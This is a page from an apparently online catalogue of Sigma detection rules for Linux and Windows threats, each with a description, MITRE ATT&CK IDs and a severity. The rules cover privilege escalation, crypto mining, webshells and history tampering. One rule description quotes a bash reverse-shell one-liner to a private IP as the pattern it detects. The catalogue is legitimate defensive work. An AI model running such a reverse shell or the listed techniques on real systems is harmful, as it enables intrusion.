EXPLORE

EXPLORE DETECTIONS

🔍
3,252 detections found

Legitimate Application Writing Files In Uncommon Location

Detects legitimate applications writing any type of file to uncommon or suspicious locations that are not typical for application data storage or execution. Adversaries may leverage legitimate applications (Living off the Land Binaries - LOLBins) to drop or download malicious files to uncommon locations on the system to evade detection by security solutions.

T1218T1105
Sigmahigh

Linux Base64 Encoded Pipe to Shell

Detects suspicious process command line that uses base64 encoded input for execution with a shell

T1140
Sigmamedium

Linux Base64 Encoded Shebang In CLI

Detects the presence of a base64 version of the shebang in the commandline, which could indicate a malicious payload about to be decoded

T1140
Sigmamedium

Linux Capabilities Discovery

Detects attempts to discover the files with setuid/setgid capability on them. That would allow adversary to escalate their privileges.

T1083T1548
Sigmalow

Linux Command History Tampering

Detects commands that try to clear or tamper with the Linux command history. This technique is used by threat actors in order to evade defenses and execute commands without them being recorded in files such as "bash_history" or "zsh_history".

T1070.003
Sigmahigh

Linux Crypto Mining Indicators

Detects command line parameters or strings often used by crypto miners

T1496
Sigmahigh

Linux Crypto Mining Pool Connections

Detects process connections to a Monero crypto mining pool

T1496
Sigmahigh

Linux Doas Conf File Creation

Detects the creation of doas.conf file in linux host platform.

T1548
Sigmamedium

Linux Doas Tool Execution

Detects the doas tool execution in linux host platform. This utility tool allow standard users to perform tasks as root, the same way sudo does.

T1548
Sigmalow

Linux HackTool Execution

Detects known hacktool execution based on image name.

T1587
Sigmahigh

Linux Keylogging with Pam.d

Detect attempt to enable auditing of TTY input

T1003T1056.001
Sigmahigh

Linux Network Service Scanning - Auditd

Detects enumeration of local or remote network services.

T1046
Sigmalow

Linux Network Service Scanning Tools Execution

Detects execution of network scanning and reconnaisance tools. These tools can be used for the enumeration of local or remote network services for example.

T1046
Sigmalow

Linux Package Uninstall

Detects linux package removal using builtin tools such as "yum", "apt", "apt-get" or "dpkg".

T1070
Sigmalow

Linux Recon Indicators

Detects events with patterns found in commands used for reconnaissance on linux systems

T1592.004T1552.001
Sigmahigh

Linux Remote System Discovery

Detects the enumeration of other remote systems.

T1018
Sigmalow

Linux Reverse Shell Indicator

Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')

T1059.004
Sigmacritical

Linux Setgid Capability Set on a Binary via Setcap Utility

Detects the use of the 'setcap' utility to set the 'setgid' capability (cap_setgid) on a binary file. This capability allows a non privileged process to make arbitrary manipulations of group IDs (GIDs), including setting its current GID to a value that would otherwise be restricted (i.e. GID 0, the root group). This behavior can be used by adversaries to backdoor a binary in order to escalate privileges again in the future if needed.

T1548T1554
Sigmalow

Linux Setuid Capability Set on a Binary via Setcap Utility

Detects the use of the 'setcap' utility to set the 'setuid' capability (cap_setuid) on a binary file. This capability allows a non privileged process to make arbitrary manipulations of user IDs (UIDs), including setting its current UID to a value that would otherwise be restricted (i.e. UID 0, the root user). This behavior can be used by adversaries to backdoor a binary in order to escalate privileges again in the future if needed.

T1548T1554
Sigmalow

Linux Shell Pipe to Shell

Detects suspicious process command line that starts with a shell that executes something and finally gets piped into another shell

T1140
Sigmamedium

Linux Sudo Chroot Execution

Detects the execution of 'sudo' command with '--chroot' option, which is used to change the root directory for command execution. Attackers may use this technique to evade detection and execute commands in a modified environment. This can be part of a privilege escalation strategy, as it allows the execution of commands with elevated privileges in a controlled environment as seen in CVE-2025-32463. While investigating, look out for unusual or unexpected use of 'sudo --chroot' in conjunction with other commands or scripts such as execution from temporary directories or unusual user accounts.

T1068
Sigmalow

Linux Webshell Indicators

Detects suspicious sub processes of web server processes

T1505.003
Sigmahigh

Live Memory Dump Using Powershell

Detects usage of a PowerShell command to dump the live memory of a Windows machine

T1003
Sigmahigh

LiveKD Driver Creation

Detects the creation of the LiveKD driver, which is used for live kernel debugging

Sigmamedium
PreviousPage 47 of 136Next